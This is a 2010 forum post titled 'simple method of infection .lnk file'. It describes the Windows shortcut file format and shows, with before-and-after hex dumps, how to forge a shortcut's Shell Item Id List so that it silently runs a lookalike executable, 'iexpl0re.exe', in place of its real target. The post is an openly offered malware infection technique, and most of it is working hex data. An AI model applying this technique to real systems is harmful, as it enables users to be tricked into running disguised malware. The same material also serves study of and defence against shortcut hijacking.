EOF forum

You are not logged in.

Pages: 1

 

  • Index
  •  » Ideas
  •  » simple method of infection .lnk file

#1 2010-01-27 17:07:15

nEINEI
Member
Registered: 2009-09-26
Posts: 27

simple method of infection .lnk file

.lnk file format

+---------------------------+
| lnk file header              |     
+---------------------------+ 
| Shell Item Id List         |   
+---------------------------+ 
| File location info           |   
+---------------------------+ 
| Description string         |   
+---------------------------+ 
| Relative path string      |   
+---------------------------+ 
| Working directory string|   
+---------------------------+     
| Command line string     |   
+---------------------------+     
| Icon filename string      |   
+---------------------------+ 
| Extra stuff                   |
+---------------------------+

.lnk points to a valid target file path only in the shell Item Id List section,modify it

shell Item Id List  record the target file path .

we have two ways to modify it so that it points to the new object file path.

1 : to directly modify the original path

for example, original path c:\11\22\33\4.exe ,

shell Item Id List  similar to the following structure:
 
   SHITEMID[0] - >  Fixed value
   SHITEMID[1] - > c:\???
   SHITEMID[2] - > ???11???
   SHITEMID[3] - > ???22???
   SHITEMID[4] - > ???33???
   SHITEMID[5] - > ???4.exe??? --->revised 5.exe

  copy new object file to directory c:\11\22\33\5.exe
  in this way, path control is not flexible enough 

2:Fake path data

.lnk file format section data are based on the relative offset,we are fake path data replace original data,
this will not affect its run.

4.exe.lnk  Shell Item Id List  section

original data :

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000040                                        EF 00 14 00               ?..
00000050   1F 50 E0 4F D0 20 EA 3A  69 10 A2 D8 08 00 2B 30   .P郞??i.⒇..+0
00000060   30 9D 19 00 2F 43 3A 5C  00 00 00 00 00 00 00 00   0?./C:\........
00000070   00 00 00 00 00 00 00 00  00 00 00 2E 00 31 00 00   .............1..
00000080   00 00 00 3B 3C B1 73 10  00 31 31 00 00 1C 00 03   ...;<眘..11.....
00000090   00 04 00 EF BE 3B 3C B1  73 3B 3C B2 73 14 00 00   ...锞;<眘;<瞫...
000000A0   00 31 00 31 00 00 00 12  00 2E 00 31 00 00 00 00   .1.1.......1....
000000B0   00 3B 3C B1 73 10 00 32  32 00 00 1C 00 03 00 04   .;<眘..22.......
000000C0   00 EF BE 3B 3C B1 73 3B  3C B2 73 14 00 00 00 32   .锞;<眘;<瞫....2
000000D0   00 32 00 00 00 12 00 2E  00 31 00 00 00 00 00 3B   .2.......1.....;
000000E0   3C B4 73 10 00 33 33 00  00 1C 00 03 00 04 00 EF   <磗..33........?
000000F0   BE 3B 3C B1 73 3B 3C B5  73 14 00 00 00 33 00 33   ?<眘;<� ....3.3
00000100   00 00 00 12 00 36 00 32  00 00 00 00 00 3B 3C B4   .....6.2.....;<?
00000110   73 20 00 34 2E 65 78 65  00 22 00 03 00 04 00 EF   s .4.exe.".....?
00000120   BE 3B 3C B4 73 3B 3C B4  73 14 00 00 00 34 00 2E   ?<磗;<磗....4..
00000130   00 65 00 78 00 65 00 00  00 14 00                  .e.x.e.....

target file path, c:\Program Files\Internet Explorer\iexpl0re.exe
fake new data :

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000040                                        17 01 14 00               ....
00000050   1F 50 E0 4F D0 20 EA 3A  69 10 A2 D8 08 00 2B 30   .P郞??i.⒇..+0
00000060   30 9D 19 00 2F 43 3A 5C  00 00 00 00 00 00 00 00   0?./C:\........
00000070   00 00 00 00 00 00 00 00  00 00 00 4A 00 31 00 00   ...........J.1..
00000080   00 00 00 31 3C DA 71 11  00 50 52 4F 47 52 41 7E   ...1<趒..PROGRA~
00000090   31 00 00 32 00 03 00 04  00 EF BE 57 3B 8C 41 3B   1..2.....锞W;孉;
000000A0   3C B4 73 14 00 00 00 50  00 72 00 6F 00 67 00 72   <磗....P.r.o.g.r
000000B0   00 61 00 6D 00 20 00 46  00 69 00 6C 00 65 00 73   .a.m. .F.i.l.e.s
000000C0   00 00 00 18 00 52 00 31  00 00 00 00 00 8E 3B 86   .....R.1.....??
000000D0   10 10 00 49 4E 54 45 52  4E 7E 31 00 00 3A 00 03   ...INTERN~1..:..
000000E0   00 04 00 EF BE 57 3B AD  42 3B 3C 95 71 14 00 00   ...锞W;瑽;<晀...
000000F0   00 49 00 6E 00 74 00 65  00 72 00 6E 00 65 00 74   .I.n.t.e.r.n.e.t
00000100   00 20 00 45 00 78 00 70  00 6C 00 6F 00 72 00 65   . .E.x.p.l.o.r.e
00000110   00 72 00 00 00 18 00 4C  00 32 00 00 6C 01 00 1C   .r.....L.2..l...
00000120   3B D0 50 20 00 69 65 78  70 6C 30 72 65 2E 65 78   ;� � .iexpl0re.ex
00000130   65 00 00 30 00 03 00 04  00 EF BE 3B 3C 24 77 3B   e..0.....锞;<$w;
00000140   3C 24 77 14 00 00 00 69  00 65 00 78 00 70 00 6C   <$w....i.e.x.p.l
00000150   00 30 00 72 00 65 00 2E  00 65 00 78 00 65 00 00   .0.r.e...e.x.e..
00000160   00 1C 00                                           ...
 

you can replace it.
4.exe.lnk -> shellexecute iexpl0re.exe.

forgive me for poor englishO:)

Last edited by nEINEI (2010-01-27 17:08:00)

i like this

Offline

 

 

Pages: 1

  • Index
  •  » Ideas
  •  » simple method of infection .lnk file

Board footer